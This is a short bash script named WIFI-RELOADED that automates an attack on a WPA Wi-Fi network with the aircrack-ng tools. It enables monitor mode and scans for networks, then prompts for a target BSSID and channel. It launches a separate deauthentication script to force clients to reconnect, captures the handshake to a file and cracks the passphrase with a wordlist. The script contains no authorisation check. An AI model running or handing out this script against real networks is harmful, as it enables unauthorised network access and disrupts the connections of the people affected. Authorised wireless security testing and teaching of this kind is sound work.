#!/bin/bash

reset () {
  clear
  figlet WIFI-RELOADED
  echo "--------------------------------------------------------------------------------"
}

reset
echo "Full Auto Activated"
sleep 1
reset
airmon-ng
echo "--------------------------------------------------------------------------------"
read -p "Select The Wireless Interface You Want To Use: " monInterfacestart
reset
airmon-ng start $monInterfacestart
reset
airmon-ng
echo "--------------------------------------------------------------------------------"
read -p "What Is Your Monitor Interface: " monInterface
export monInterface
reset
echo "Press CTRL-C To Stop"
echo "3"
sleep 1
echo "2"
sleep 1
echo "1"
sleep 1
airodump-ng $monInterface
echo "--------------------------------------------------------------------------------"
read -p "What Is The BSSID: " bssid
export bssid
echo "--------------------------------------------------------------------------------"
read -p "What Is The Channel: " channel
reset
read -p "Handshake CAP FIle Name: " fop
mkdir Handshakes/$fop
reset
echo "Press CTRL-C To Stop"
echo "3"
sleep 1
echo "2"
sleep 1
echo "1"
sleep 1
gnome-terminal -e ./deauth-fa && airodump-ng -c $channel -w Handshakes/$fop/$fop --bssid $bssid $monInterface
echo "--------------------------------------------------------------------------------"
reset
read -p "Wordlist Path: " wordlist
reset
cappath="Handshakes/$fop/$fop-01.cap"
echo "Press CTRL-C To Stop"
echo "3"
sleep 1
echo "2"
sleep 1
echo "1"
sleep 1
aircrack-ng -w $wordlist $cappath
echo "--------------------------------------------------------------------------------"
read -p "Go Back? [yes/no]: " back
if [ $back == yes ]
then
  ./wifi-reloaded
fi
